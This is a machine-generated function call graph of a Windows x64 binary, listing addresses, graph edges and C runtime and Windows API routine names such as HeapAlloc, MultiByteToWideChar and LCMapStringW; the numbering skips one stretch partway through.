7ff62cc8b379 FlsSetValue 16662->16663 16664 7ff62cc8b35c 16662->16664 16665 7ff62cc8b369 16663->16665 16666 7ff62cc8b38b 16663->16666 16664->16663 16664->16665 16667 7ff62cc8b3e5 SetLastError 16665->16667 16668 7ff62cc8ec08 _get_daylight 5 API calls 16666->16668 16667->16655 16669 7ff62cc8b39a 16668->16669 16670 7ff62cc8b3b8 FlsSetValue 16669->16670 16671 7ff62cc8b3a8 FlsSetValue 16669->16671 16673 7ff62cc8b3c4 FlsSetValue 16670->16673 16674 7ff62cc8b3d6 16670->16674 16672 7ff62cc8b3b1 16671->16672 16676 7ff62cc8a9b8 __free_lconv_num 5 API calls 16672->16676 16673->16672 16675 7ff62cc8af64 _get_daylight 5 API calls 16674->16675 16677 7ff62cc8b3de 16675->16677 16676->16665 16678 7ff62cc8a9b8 __free_lconv_num 5 API calls 16677->16678 16678->16667 16691 7ff62cc90348 EnterCriticalSection 16679->16691 16694 7ff62cc8a6be __CxxCallCatchBlock memcpy_s 16693->16694 16695 7ff62cc8a6e6 RtlCaptureContext RtlLookupFunctionEntry 16694->16695 16696 7ff62cc8a720 RtlVirtualUnwind 16695->16696 16697 7ff62cc8a756 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16695->16697 16696->16697 16698 7ff62cc8a7a8 __CxxCallCatchBlock 16697->16698 16699 7ff62cc7c5c0 _log10_special 8 API calls 16698->16699 16700 7ff62cc8a7c7 GetCurrentProcess TerminateProcess 16699->16700 16703 7ff62cc736bc GetModuleFileNameW 16702->16703 16703->16276 16703->16277 16705 7ff62cc7932f FindClose 16704->16705 16706 7ff62cc79342 16704->16706 16705->16706 16707 7ff62cc7c5c0 _log10_special 8 API calls 16706->16707 16708 7ff62cc7371a 16707->16708 16708->16281 16708->16282 16710 7ff62cc7c8c0 16709->16710 16711 7ff62cc72c70 GetCurrentProcessId 16710->16711 16740 7ff62cc726b0 16711->16740 16713 7ff62cc72cb9 16744 7ff62cc84c48 16713->16744 16716 7ff62cc726b0 48 API calls 16717 7ff62cc72d34 FormatMessageW 16716->16717 16719 7ff62cc72d6d 16717->16719 16720 7ff62cc72d7f MessageBoxW 16717->16720 16721 7ff62cc726b0 48 API calls 16719->16721 16722 7ff62cc7c5c0 _log10_special 8 API calls 16720->16722 
16721->16720 16723 7ff62cc72daf 16722->16723 16723->16293 16725 7ff62cc73730 16724->16725 16726 7ff62cc793b0 GetFinalPathNameByHandleW CloseHandle 16724->16726 16725->16289 16725->16290 16726->16725 16728 7ff62cc72834 16727->16728 16729 7ff62cc726b0 48 API calls 16728->16729 16730 7ff62cc72887 16729->16730 16731 7ff62cc84c48 48 API calls 16730->16731 16732 7ff62cc728d0 MessageBoxW 16731->16732 16733 7ff62cc7c5c0 _log10_special 8 API calls 16732->16733 16734 7ff62cc72900 16733->16734 16734->16293 16736 7ff62cc794da WideCharToMultiByte 16735->16736 16737 7ff62cc79505 16735->16737 16736->16737 16739 7ff62cc7951b __std_exception_copy 16736->16739 16738 7ff62cc79522 WideCharToMultiByte 16737->16738 16737->16739 16738->16739 16739->16288 16741 7ff62cc726d5 16740->16741 16742 7ff62cc84c48 48 API calls 16741->16742 16743 7ff62cc726f8 16742->16743 16743->16713 16748 7ff62cc84ca2 16744->16748 16745 7ff62cc84cc7 16746 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16745->16746 16750 7ff62cc84cf1 16746->16750 16747 7ff62cc84d03 16762 7ff62cc83000 16747->16762 16748->16745 16748->16747 16751 7ff62cc7c5c0 _log10_special 8 API calls 16750->16751 16753 7ff62cc72d04 16751->16753 16752 7ff62cc8a9b8 __free_lconv_num 11 API calls 16752->16750 16753->16716 16755 7ff62cc84e0a 16758 7ff62cc84e14 16755->16758 16761 7ff62cc84de4 16755->16761 16756 7ff62cc8a9b8 __free_lconv_num 11 API calls 16756->16750 16757 7ff62cc84db0 16760 7ff62cc84db9 16757->16760 16757->16761 16759 7ff62cc8a9b8 __free_lconv_num 11 API calls 16758->16759 16759->16750 16760->16756 16761->16752 16763 7ff62cc8303e 16762->16763 16768 7ff62cc8302e 16762->16768 16764 7ff62cc83047 16763->16764 16771 7ff62cc83075 16763->16771 16766 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16764->16766 16765 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16767 7ff62cc8306d 16765->16767 16766->16767 16767->16755 16767->16757 16767->16760 16767->16761 16768->16765 16771->16767 16771->16768 16773 7ff62cc83a14 16771->16773 
16806 7ff62cc83460 16771->16806 16843 7ff62cc82bf0 16771->16843 16774 7ff62cc83ac7 16773->16774 16775 7ff62cc83a56 16773->16775 16778 7ff62cc83acc 16774->16778 16779 7ff62cc83b20 16774->16779 16776 7ff62cc83a5c 16775->16776 16777 7ff62cc83af1 16775->16777 16780 7ff62cc83a61 16776->16780 16781 7ff62cc83a90 16776->16781 16866 7ff62cc81dc4 16777->16866 16782 7ff62cc83b01 16778->16782 16783 7ff62cc83ace 16778->16783 16785 7ff62cc83b2a 16779->16785 16786 7ff62cc83b37 16779->16786 16790 7ff62cc83b2f 16779->16790 16780->16786 16788 7ff62cc83a67 16780->16788 16781->16788 16781->16790 16873 7ff62cc819b4 16782->16873 16784 7ff62cc83a70 16783->16784 16793 7ff62cc83add 16783->16793 16805 7ff62cc83b60 16784->16805 16846 7ff62cc841c8 16784->16846 16785->16777 16785->16790 16880 7ff62cc8471c 16786->16880 16788->16784 16794 7ff62cc83aa2 16788->16794 16803 7ff62cc83a8b 16788->16803 16790->16805 16884 7ff62cc821d4 16790->16884 16793->16777 16796 7ff62cc83ae2 16793->16796 16794->16805 16856 7ff62cc84504 16794->16856 16796->16805 16862 7ff62cc845c8 16796->16862 16798 7ff62cc7c5c0 _log10_special 8 API calls 16800 7ff62cc83e5a 16798->16800 16800->16771 16804 7ff62cc83d4c 16803->16804 16803->16805 16891 7ff62cc84830 16803->16891 16804->16805 16897 7ff62cc8ea78 16804->16897 16805->16798 16807 7ff62cc83484 16806->16807 16808 7ff62cc8346e 16806->16808 16811 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16807->16811 16812 7ff62cc834c4 16807->16812 16809 7ff62cc83ac7 16808->16809 16810 7ff62cc83a56 16808->16810 16808->16812 16815 7ff62cc83acc 16809->16815 16816 7ff62cc83b20 16809->16816 16813 7ff62cc83a5c 16810->16813 16814 7ff62cc83af1 16810->16814 16811->16812 16812->16771 16817 7ff62cc83a61 16813->16817 16818 7ff62cc83a90 16813->16818 16824 7ff62cc81dc4 38 API calls 16814->16824 16819 7ff62cc83b01 16815->16819 16820 7ff62cc83ace 16815->16820 16822 7ff62cc83b2a 16816->16822 16823 7ff62cc83b37 16816->16823 16827 7ff62cc83b2f 16816->16827 16817->16823 16825 7ff62cc83a67 16817->16825 
16818->16825 16818->16827 16829 7ff62cc819b4 38 API calls 16819->16829 16821 7ff62cc83a70 16820->16821 16832 7ff62cc83add 16820->16832 16826 7ff62cc841c8 47 API calls 16821->16826 16842 7ff62cc83b60 16821->16842 16822->16814 16822->16827 16828 7ff62cc8471c 45 API calls 16823->16828 16840 7ff62cc83a8b 16824->16840 16825->16821 16830 7ff62cc83aa2 16825->16830 16825->16840 16826->16840 16831 7ff62cc821d4 38 API calls 16827->16831 16827->16842 16828->16840 16829->16840 16833 7ff62cc84504 46 API calls 16830->16833 16830->16842 16831->16840 16832->16814 16834 7ff62cc83ae2 16832->16834 16833->16840 16836 7ff62cc845c8 37 API calls 16834->16836 16834->16842 16835 7ff62cc7c5c0 _log10_special 8 API calls 16837 7ff62cc83e5a 16835->16837 16836->16840 16837->16771 16838 7ff62cc84830 45 API calls 16841 7ff62cc83d4c 16838->16841 16839 7ff62cc8ea78 46 API calls 16839->16841 16840->16838 16840->16841 16840->16842 16841->16839 16841->16842 16842->16835 17123 7ff62cc81038 16843->17123 16847 7ff62cc841ee 16846->16847 16909 7ff62cc80bf0 16847->16909 16852 7ff62cc84830 45 API calls 16853 7ff62cc84333 16852->16853 16854 7ff62cc84830 45 API calls 16853->16854 16855 7ff62cc843c1 16853->16855 16854->16855 16855->16803 16859 7ff62cc84539 16856->16859 16857 7ff62cc8457e 16857->16803 16858 7ff62cc84557 16860 7ff62cc8ea78 46 API calls 16858->16860 16859->16857 16859->16858 16861 7ff62cc84830 45 API calls 16859->16861 16860->16857 16861->16858 16863 7ff62cc845e9 16862->16863 16864 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16863->16864 16865 7ff62cc8461a 16863->16865 16864->16865 16865->16803 16867 7ff62cc81df7 16866->16867 16868 7ff62cc81e26 16867->16868 16870 7ff62cc81ee3 16867->16870 16872 7ff62cc81e63 16868->16872 17055 7ff62cc80c98 16868->17055 16871 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16870->16871 16871->16872 16872->16803 16875 7ff62cc819e7 16873->16875 16874 7ff62cc81a16 16876 7ff62cc80c98 12 API calls 16874->16876 16879 7ff62cc81a53 16874->16879 16875->16874 
16877 7ff62cc81ad3 16875->16877 16876->16879 16878 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16877->16878 16878->16879 16879->16803 16881 7ff62cc8475f 16880->16881 16883 7ff62cc84763 __crtLCMapStringW 16881->16883 17063 7ff62cc847b8 16881->17063 16883->16803 16885 7ff62cc82207 16884->16885 16886 7ff62cc82236 16885->16886 16888 7ff62cc822f3 16885->16888 16887 7ff62cc80c98 12 API calls 16886->16887 16890 7ff62cc82273 16886->16890 16887->16890 16889 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16888->16889 16889->16890 16890->16803 16892 7ff62cc84847 16891->16892 17067 7ff62cc8da28 16892->17067 16898 7ff62cc8eaa9 16897->16898 16906 7ff62cc8eab7 16897->16906 16899 7ff62cc8ead7 16898->16899 16900 7ff62cc84830 45 API calls 16898->16900 16898->16906 16901 7ff62cc8eb0f 16899->16901 16902 7ff62cc8eae8 16899->16902 16900->16899 16904 7ff62cc8eb39 16901->16904 16905 7ff62cc8eb9a 16901->16905 16901->16906 17113 7ff62cc90110 16902->17113 16904->16906 17116 7ff62cc8f910 16904->17116 16907 7ff62cc8f910 _fread_nolock MultiByteToWideChar 16905->16907 16906->16804 16907->16906 16910 7ff62cc80c27 16909->16910 16915 7ff62cc80c16 16909->16915 16910->16915 16939 7ff62cc8d66c 16910->16939 16913 7ff62cc8a9b8 __free_lconv_num 11 API calls 16913->16915 16914 7ff62cc8a9b8 __free_lconv_num 11 API calls 16916 7ff62cc80c68 16914->16916 16917 7ff62cc8e5e0 16915->16917 16916->16913 16918 7ff62cc8e630 16917->16918 16919 7ff62cc8e5fd 16917->16919 16918->16919 16922 7ff62cc8e662 16918->16922 16920 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16919->16920 16921 7ff62cc84311 16920->16921 16921->16852 16921->16853 16927 7ff62cc8e775 16922->16927 16934 7ff62cc8e6aa 16922->16934 16923 7ff62cc8e867 16979 7ff62cc8dacc 16923->16979 16925 7ff62cc8e82d 16972 7ff62cc8de64 16925->16972 16927->16923 16927->16925 16928 7ff62cc8e7fc 16927->16928 16929 7ff62cc8e7bf 16927->16929 16931 7ff62cc8e7b5 16927->16931 16965 7ff62cc8e144 16928->16965 16955 7ff62cc8e374 16929->16955 16931->16925 16933 
7ff62cc8e7ba 16931->16933 16933->16928 16933->16929 16934->16921 16946 7ff62cc8a514 16934->16946 16937 7ff62cc8a970 _isindst 17 API calls 16938 7ff62cc8e8c4 16937->16938 16940 7ff62cc8d6b7 16939->16940 16941 7ff62cc8d67b _get_daylight 16939->16941 16943 7ff62cc84f78 _get_daylight 11 API calls 16940->16943 16941->16940 16942 7ff62cc8d69e HeapAlloc 16941->16942 16945 7ff62cc93600 _get_daylight 2 API calls 16941->16945 16942->16941 16944 7ff62cc80c54 16942->16944 16943->16944 16944->16914 16944->16916 16945->16941 16947 7ff62cc8a521 16946->16947 16948 7ff62cc8a52b 16946->16948 16947->16948 16953 7ff62cc8a546 16947->16953 16949 7ff62cc84f78 _get_daylight 11 API calls 16948->16949 16950 7ff62cc8a532 16949->16950 16988 7ff62cc8a950 16950->16988 16952 7ff62cc8a53e 16952->16921 16952->16937 16953->16952 16954 7ff62cc84f78 _get_daylight 11 API calls 16953->16954 16954->16950 16991 7ff62cc9411c 16955->16991 16959 7ff62cc8e420 16959->16921 16960 7ff62cc8e471 17044 7ff62cc8df60 16960->17044 16961 7ff62cc8e41c 16961->16959 16961->16960 16962 7ff62cc8e43c 16961->16962 17040 7ff62cc8e21c 16962->17040 16966 7ff62cc9411c 38 API calls 16965->16966 16967 7ff62cc8e18e 16966->16967 16968 7ff62cc93b64 37 API calls 16967->16968 16969 7ff62cc8e1de 16968->16969 16970 7ff62cc8e1e2 16969->16970 16971 7ff62cc8e21c 45 API calls 16969->16971 16970->16921 16971->16970 16973 7ff62cc9411c 38 API calls 16972->16973 16974 7ff62cc8deaf 16973->16974 16975 7ff62cc93b64 37 API calls 16974->16975 16976 7ff62cc8df07 16975->16976 16977 7ff62cc8df0b 16976->16977 16978 7ff62cc8df60 45 API calls 16976->16978 16977->16921 16978->16977 16980 7ff62cc8db11 16979->16980 16981 7ff62cc8db44 16979->16981 16983 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16980->16983 16982 7ff62cc8db5c 16981->16982 16986 7ff62cc8dbdd 16981->16986 16984 7ff62cc8de64 46 API calls 16982->16984 16985 7ff62cc8db3d memcpy_s 16983->16985 16984->16985 16985->16921 16986->16985 16987 7ff62cc84830 45 API calls 16986->16987 16987->16985 
16989 7ff62cc8a7e8 _invalid_parameter_noinfo 37 API calls 16988->16989 16990 7ff62cc8a969 16989->16990 16990->16952 16992 7ff62cc9416f fegetenv 16991->16992 16993 7ff62cc97e9c 37 API calls 16992->16993 16997 7ff62cc941c2 16993->16997 16994 7ff62cc941ef 16999 7ff62cc8a514 __std_exception_copy 37 API calls 16994->16999 16995 7ff62cc942b2 16996 7ff62cc97e9c 37 API calls 16995->16996 16998 7ff62cc942dc 16996->16998 16997->16995 17001 7ff62cc941dd 16997->17001 17002 7ff62cc9428c 16997->17002 17003 7ff62cc97e9c 37 API calls 16998->17003 17000 7ff62cc9426d 16999->17000 17004 7ff62cc95394 17000->17004 17010 7ff62cc94275 17000->17010 17001->16994 17001->16995 17005 7ff62cc8a514 __std_exception_copy 37 API calls 17002->17005 17006 7ff62cc942ed 17003->17006 17007 7ff62cc8a970 _isindst 17 API calls 17004->17007 17005->17000 17008 7ff62cc98090 20 API calls 17006->17008 17009 7ff62cc953a9 17007->17009 17018 7ff62cc94356 memcpy_s 17008->17018 17011 7ff62cc7c5c0 _log10_special 8 API calls 17010->17011 17012 7ff62cc8e3c1 17011->17012 17036 7ff62cc93b64 17012->17036 17013 7ff62cc946ff memcpy_s 17014 7ff62cc94397 memcpy_s 17030 7ff62cc94cdb memcpy_s 17014->17030 17035 7ff62cc947f3 memcpy_s 17014->17035 17015 7ff62cc94a3f 17016 7ff62cc93c80 37 API calls 17015->17016 17022 7ff62cc95157 17016->17022 17017 7ff62cc949eb 17017->17015 17019 7ff62cc953ac memcpy_s 37 API calls 17017->17019 17018->17013 17018->17014 17020 7ff62cc84f78 _get_daylight 11 API calls 17018->17020 17019->17015 17021 7ff62cc947d0 17020->17021 17023 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 17021->17023 17025 7ff62cc953ac memcpy_s 37 API calls 17022->17025 17029 7ff62cc951b2 17022->17029 17023->17014 17024 7ff62cc95338 17028 7ff62cc97e9c 37 API calls 17024->17028 17025->17029 17026 7ff62cc84f78 11 API calls _get_daylight 17026->17030 17027 7ff62cc84f78 11 API calls _get_daylight 17027->17035 17028->17010 17029->17024 17031 7ff62cc93c80 37 API calls 17029->17031 17033 7ff62cc953ac memcpy_s 37 API calls 
17029->17033 17030->17015 17030->17017 17030->17026 17034 7ff62cc8a950 37 API calls _invalid_parameter_noinfo 17030->17034 17031->17029 17032 7ff62cc8a950 37 API calls _invalid_parameter_noinfo 17032->17035 17033->17029 17034->17030 17035->17017 17035->17027 17035->17032 17037 7ff62cc93b83 17036->17037 17038 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17037->17038 17039 7ff62cc93bae memcpy_s 17037->17039 17038->17039 17039->16961 17041 7ff62cc8e248 memcpy_s 17040->17041 17042 7ff62cc84830 45 API calls 17041->17042 17043 7ff62cc8e302 memcpy_s 17041->17043 17042->17043 17043->16959 17045 7ff62cc8df9b 17044->17045 17048 7ff62cc8dfe8 memcpy_s 17044->17048 17046 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17045->17046 17047 7ff62cc8dfc7 17046->17047 17047->16959 17049 7ff62cc8e053 17048->17049 17051 7ff62cc84830 45 API calls 17048->17051 17050 7ff62cc8a514 __std_exception_copy 37 API calls 17049->17050 17054 7ff62cc8e095 memcpy_s 17050->17054 17051->17049 17052 7ff62cc8a970 _isindst 17 API calls 17053 7ff62cc8e140 17052->17053 17054->17052 17056 7ff62cc80cbe 17055->17056 17057 7ff62cc80ccf 17055->17057 17056->16872 17057->17056 17058 7ff62cc8d66c _fread_nolock 12 API calls 17057->17058 17059 7ff62cc80d00 17058->17059 17060 7ff62cc80d14 17059->17060 17061 7ff62cc8a9b8 __free_lconv_num 11 API calls 17059->17061 17062 7ff62cc8a9b8 __free_lconv_num 11 API calls 17060->17062 17061->17060 17062->17056 17064 7ff62cc847d6 17063->17064 17065 7ff62cc847de 17063->17065 17066 7ff62cc84830 45 API calls 17064->17066 17065->16883 17066->17065 17068 7ff62cc8da41 17067->17068 17069 7ff62cc8486f 17067->17069 17068->17069 17075 7ff62cc93374 17068->17075 17071 7ff62cc8da94 17069->17071 17072 7ff62cc8487f 17071->17072 17073 7ff62cc8daad 17071->17073 17072->16804 17073->17072 17110 7ff62cc926c0 17073->17110 17087 7ff62cc8b1c0 GetLastError 17075->17087 17078 7ff62cc933ce 17078->17069 17088 7ff62cc8b201 FlsSetValue 17087->17088 17089 7ff62cc8b1e4 FlsGetValue 17087->17089 17090 
calls 19812->19813 19815 7ff62cc924af 19813->19815 19814 7ff62cc92505 19817 7ff62cc9256c 19814->19817 19855 7ff62cc91e64 19814->19855 19818 7ff62cc8a9b8 __free_lconv_num 11 API calls 19815->19818 19816 7ff62cc924c4 19816->19814 19819 7ff62cc8a9b8 __free_lconv_num 11 API calls 19816->19819 19821 7ff62cc8a9b8 __free_lconv_num 11 API calls 19817->19821 19818->19804 19819->19814 19821->19804 19823 7ff62cc925c7 19822->19823 19824 7ff62cc925d1 19823->19824 19870 7ff62cc90348 EnterCriticalSection 19823->19870 19826 7ff62cc92643 19824->19826 19829 7ff62cc8a574 __CxxCallCatchBlock 45 API calls 19824->19829 19826->19801 19830 7ff62cc9265b 19829->19830 19833 7ff62cc8b294 50 API calls 19830->19833 19836 7ff62cc926b2 19830->19836 19834 7ff62cc9269c 19833->19834 19835 7ff62cc92334 65 API calls 19834->19835 19835->19836 19836->19801 19838 7ff62cc84fbc 45 API calls 19837->19838 19839 7ff62cc92048 19838->19839 19840 7ff62cc92054 GetOEMCP 19839->19840 19841 7ff62cc92066 19839->19841 19842 7ff62cc9207b 19840->19842 19841->19842 19843 7ff62cc9206b GetACP 19841->19843 19842->19804 19842->19805 19843->19842 19845 7ff62cc92034 47 API calls 19844->19845 19846 7ff62cc92709 19845->19846 19847 7ff62cc9285f 19846->19847 19849 7ff62cc92746 IsValidCodePage 19846->19849 19853 7ff62cc92760 memcpy_s 19846->19853 19848 7ff62cc7c5c0 _log10_special 8 API calls 19847->19848 19850 7ff62cc924a1 19848->19850 19849->19847 19851 7ff62cc92757 19849->19851 19850->19812 19850->19816 19852 7ff62cc92786 GetCPInfo 19851->19852 19851->19853 19852->19847 19852->19853 19871 7ff62cc9214c 19853->19871 19927 7ff62cc90348 EnterCriticalSection 19855->19927 19872 7ff62cc92189 GetCPInfo 19871->19872 19873 7ff62cc9227f 19871->19873 19872->19873 19874 7ff62cc9219c 19872->19874 19875 7ff62cc7c5c0 _log10_special 8 API calls 19873->19875 19877 7ff62cc92eb0 48 API calls 19874->19877 19876 7ff62cc9231e 19875->19876 19876->19847 19878 7ff62cc92213 19877->19878 19882 7ff62cc97bf4 19878->19882 19881 7ff62cc97bf4 54 API calls 
19881->19873 19883 7ff62cc84fbc 45 API calls 19882->19883 19884 7ff62cc97c19 19883->19884 19887 7ff62cc978c0 19884->19887 19888 7ff62cc97901 19887->19888 19889 7ff62cc8f910 _fread_nolock MultiByteToWideChar 19888->19889 19893 7ff62cc9794b 19889->19893 19890 7ff62cc97bc9 19892 7ff62cc7c5c0 _log10_special 8 API calls 19890->19892 19891 7ff62cc97a81 19891->19890 19896 7ff62cc8a9b8 __free_lconv_num 11 API calls 19891->19896 19894 7ff62cc92246 19892->19894 19893->19890 19893->19891 19895 7ff62cc8d66c _fread_nolock 12 API calls 19893->19895 19897 7ff62cc97983 19893->19897 19894->19881 19895->19897 19896->19890 19897->19891 19898 7ff62cc8f910 _fread_nolock MultiByteToWideChar 19897->19898 19899 7ff62cc979f6 19898->19899 19899->19891 19918 7ff62cc8f154 19899->19918 19902 7ff62cc97a41 19902->19891 19904 7ff62cc8f154 __crtLCMapStringW 6 API calls 19902->19904 19903 7ff62cc97a92 19905 7ff62cc8d66c _fread_nolock 12 API calls 19903->19905 19906 7ff62cc97b64 19903->19906 19908 7ff62cc97ab0 19903->19908 19904->19891 19905->19908 19906->19891 19907 7ff62cc8a9b8 __free_lconv_num 11 API calls 19906->19907 19907->19891 19908->19891 19909 7ff62cc8f154 __crtLCMapStringW 6 API calls 19908->19909 19910 7ff62cc97b30 19909->19910 19910->19906 19911 7ff62cc97b50 19910->19911 19912 7ff62cc97b66 19910->19912 19913 7ff62cc90858 WideCharToMultiByte 19911->19913 19914 7ff62cc90858 WideCharToMultiByte 19912->19914 19915 7ff62cc97b5e 19913->19915 19914->19915 19915->19906 19916 7ff62cc97b7e 19915->19916 19916->19891 19917 7ff62cc8a9b8 __free_lconv_num 11 API calls 19916->19917 19917->19891 19919 7ff62cc8ed80 __crtLCMapStringW 5 API calls 19918->19919 19920 7ff62cc8f192 19919->19920 19921 7ff62cc8f19a 19920->19921 19924 7ff62cc8f240 19920->19924 19921->19891 19921->19902 19921->19903 19923 7ff62cc8f203 LCMapStringW 19923->19921 19925 7ff62cc8ed80 __crtLCMapStringW 5 API calls 19924->19925 19926 7ff62cc8f26e __crtLCMapStringW 19925->19926 19926->19923 19929 7ff62cc893b9 19928->19929 19930 
7ff62cc8951d 19928->19930 19929->19772 19931 7ff62cc89546 19930->19931 19933 7ff62cc8a9b8 __free_lconv_num 11 API calls 19930->19933 19932 7ff62cc8a9b8 __free_lconv_num 11 API calls 19931->19932 19932->19929 19933->19930 19935 7ff62cc96331 19934->19935 19936 7ff62cc96348 19934->19936 19937 7ff62cc84f78 _get_daylight 11 API calls 19935->19937 19936->19935 19938 7ff62cc96356 19936->19938 19939 7ff62cc96336 19937->19939 19941 7ff62cc84fbc 45 API calls 19938->19941 19942 7ff62cc96341 19938->19942 19940 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19939->19940 19940->19942 19941->19942 19942->19614 19944 7ff62cc84fbc 45 API calls 19943->19944 19945 7ff62cc98fe1 19944->19945 19948 7ff62cc98c38 19945->19948 19950 7ff62cc98c86 19948->19950 19949 7ff62cc7c5c0 _log10_special 8 API calls 19951 7ff62cc97275 19949->19951 19952 7ff62cc98d0d 19950->19952 19954 7ff62cc98cf8 GetCPInfo 19950->19954 19957 7ff62cc98d11 19950->19957 19951->19614 19951->19637 19953 7ff62cc8f910 _fread_nolock MultiByteToWideChar 19952->19953 19952->19957 19955 7ff62cc98da5 19953->19955 19954->19952 19954->19957 19956 7ff62cc8d66c _fread_nolock 12 API calls 19955->19956 19955->19957 19958 7ff62cc98ddc 19955->19958 19956->19958 19957->19949 19958->19957 19959 7ff62cc8f910 _fread_nolock MultiByteToWideChar 19958->19959 19960 7ff62cc98e4a 19959->19960 19961 7ff62cc98f2c 19960->19961 19962 7ff62cc8f910 _fread_nolock MultiByteToWideChar 19960->19962 19961->19957 19963 7ff62cc8a9b8 __free_lconv_num 11 API calls 19961->19963 19964 7ff62cc98e70 19962->19964 19963->19957 19964->19961 19965 7ff62cc8d66c _fread_nolock 12 API calls 19964->19965 19966 7ff62cc98e9d 19964->19966 19965->19966 19966->19961 19967 7ff62cc8f910 _fread_nolock MultiByteToWideChar 19966->19967 19968 7ff62cc98f14 19967->19968 19969 7ff62cc98f34 19968->19969 19970 7ff62cc98f1a 19968->19970 19977 7ff62cc8efd8 19969->19977 19970->19961 19972 7ff62cc8a9b8 __free_lconv_num 11 API calls 19970->19972 19972->19961 19974 7ff62cc98f73 19974->19957 
19976 7ff62cc8a9b8 __free_lconv_num 11 API calls 19974->19976 19975 7ff62cc8a9b8 __free_lconv_num 11 API calls 19975->19974 19976->19957 19978 7ff62cc8ed80 __crtLCMapStringW 5 API calls 19977->19978 19980 7ff62cc8f016 19978->19980 19979 7ff62cc8f01e 19979->19974 19979->19975 19980->19979 19981 7ff62cc8f240 __crtLCMapStringW 5 API calls 19980->19981 19982 7ff62cc8f087 CompareStringW 19981->19982 19982->19979 19984 7ff62cc97cb1 19983->19984 19985 7ff62cc97cca HeapSize 19983->19985 19986 7ff62cc84f78 _get_daylight 11 API calls 19984->19986 19987 7ff62cc97cb6 19986->19987 19988 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19987->19988 19989 7ff62cc97cc1 19988->19989 19989->19646 19991 7ff62cc97d03 19990->19991 19992 7ff62cc97cf9 19990->19992 19994 7ff62cc97d08 19991->19994 20000 7ff62cc97d0f _get_daylight 19991->20000 19993 7ff62cc8d66c _fread_nolock 12 API calls 19992->19993 19999 7ff62cc97d01 19993->19999 19997 7ff62cc8a9b8 __free_lconv_num 11 API calls 19994->19997 19995 7ff62cc97d42 HeapReAlloc 19995->19999 19995->20000 19996 7ff62cc97d15 19998 7ff62cc84f78 _get_daylight 11 API calls 19996->19998 19997->19999 19998->19999 19999->19645 20000->19995 20000->19996 20001 7ff62cc93600 _get_daylight 2 API calls 20000->20001 20001->20000 20003 7ff62cc8ed80 __crtLCMapStringW 5 API calls 20002->20003 20004 7ff62cc8efb4 20003->20004 20004->19650 20006 7ff62cc8556a 20005->20006 20007 7ff62cc85546 20005->20007 20008 7ff62cc855c4 20006->20008 20009 7ff62cc8556f 20006->20009 20011 7ff62cc8a9b8 __free_lconv_num 11 API calls 20007->20011 20013 7ff62cc85555 20007->20013 20010 7ff62cc8f910 _fread_nolock MultiByteToWideChar 20008->20010 20012 7ff62cc85584 20009->20012 20009->20013 20014 7ff62cc8a9b8 __free_lconv_num 11 API calls 20009->20014 20018 7ff62cc855e0 20010->20018 20011->20013 20015 7ff62cc8d66c _fread_nolock 12 API calls 20012->20015 20013->19654 20013->19655 20014->20012 20015->20013 20016 7ff62cc855e7 GetLastError 20017 7ff62cc84eec _fread_nolock 11 API calls 
20016->20017 20020 7ff62cc855f4 20017->20020 20018->20016 20021 7ff62cc8a9b8 __free_lconv_num 11 API calls 20018->20021 20025 7ff62cc85615 20018->20025 20026 7ff62cc85622 20018->20026 20019 7ff62cc8f910 _fread_nolock MultiByteToWideChar 20023 7ff62cc85666 20019->20023 20024 7ff62cc84f78 _get_daylight 11 API calls 20020->20024 20021->20025 20022 7ff62cc8d66c _fread_nolock 12 API calls 20022->20026 20023->20013 20023->20016 20024->20013 20025->20022 20026->20013 20026->20019 20028 7ff62cc89295 20027->20028 20039 7ff62cc89291 20027->20039 20048 7ff62cc92aac GetEnvironmentStringsW 20028->20048 20031 7ff62cc892ae 20055 7ff62cc893fc 20031->20055 20032 7ff62cc892a2 20033 7ff62cc8a9b8 __free_lconv_num 11 API calls 20032->20033 20033->20039 20036 7ff62cc8a9b8 __free_lconv_num 11 API calls 20037 7ff62cc892d5 20036->20037 20038 7ff62cc8a9b8 __free_lconv_num 11 API calls 20037->20038 20038->20039 20039->19682 20040 7ff62cc8963c 20039->20040 20041 7ff62cc8965f 20040->20041 20046 7ff62cc89676 20040->20046 20041->19682 20042 7ff62cc8f910 MultiByteToWideChar _fread_nolock 20042->20046 20043 7ff62cc8ec08 _get_daylight 11 API calls 20043->20046 20044 7ff62cc896ea 20045 7ff62cc8a9b8 __free_lconv_num 11 API calls 20044->20045 20045->20041 20046->20041 20046->20042 20046->20043 20046->20044 20047 7ff62cc8a9b8 __free_lconv_num 11 API calls 20046->20047 20047->20046 20049 7ff62cc8929a 20048->20049 20052 7ff62cc92ad0 20048->20052 20049->20031 20049->20032 20050 7ff62cc8d66c _fread_nolock 12 API calls 20051 7ff62cc92b07 memcpy_s 20050->20051 20053 7ff62cc8a9b8 __free_lconv_num 11 API calls 20051->20053 20052->20050 20054 7ff62cc92b27 FreeEnvironmentStringsW 20053->20054 20054->20049 20056 7ff62cc89424 20055->20056 20057 7ff62cc8ec08 _get_daylight 11 API calls 20056->20057 20067 7ff62cc8945f 20057->20067 20058 7ff62cc8a9b8 __free_lconv_num 11 API calls 20059 7ff62cc892b6 20058->20059 20059->20036 20060 7ff62cc894e1 20061 7ff62cc8a9b8 __free_lconv_num 11 API calls 20060->20061 20061->20059 
